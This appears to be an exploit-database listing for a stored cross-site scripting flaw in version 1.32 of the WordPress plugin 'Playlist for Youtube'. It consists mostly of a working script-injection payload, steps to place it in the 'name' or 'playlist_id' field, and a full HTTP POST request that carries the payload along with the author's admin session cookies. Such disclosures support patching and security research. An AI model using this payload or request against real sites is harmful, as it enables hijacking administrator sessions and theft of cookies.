Lucene search

K
packetstormErdemstarPACKETSTORM:178032
HistoryApr 12, 2024 - 12:00 a.m.

WordPress Playlist For Youtube 1.32 Cross Site Scripting

2024-04-1200:00:00
Erdemstar
packetstormsecurity.com
94
exploit
wordpress
cross site scripting
stored
xss
vulnerable
playlist
youtube
security
proof of concept
erdemstar
admin
cookie
payload
request
vulnerable properties
poc video
vendor
version
date
exploit author

7.4 High

AI Score

Confidence

Low

`# Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)  
# Date: 22 March 2024  
# Exploit Author: Erdemstar  
# Vendor: https://wordpress.com/  
# Version: 1.32  
  
# Proof Of Concept:  
1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID".  
  
# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns  
# Vulnerable Properties name: name, playlist_id  
# Payload: "><script>alert(document.cookie)</script>  
# Request:  
POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2  
Host: erdemstar.local  
Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9  
Content-Length: 178  
Cache-Control: max-age=0  
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"  
Sec-Ch-Ua-Mobile: ?0  
Sec-Ch-Ua-Platform: "macOS"  
Upgrade-Insecure-Requests: 1  
Origin: https://erdemstar.local  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_free  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Priority: u=0, i  
  
_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000  
  
  
`

7.4 High

AI Score

Confidence

Low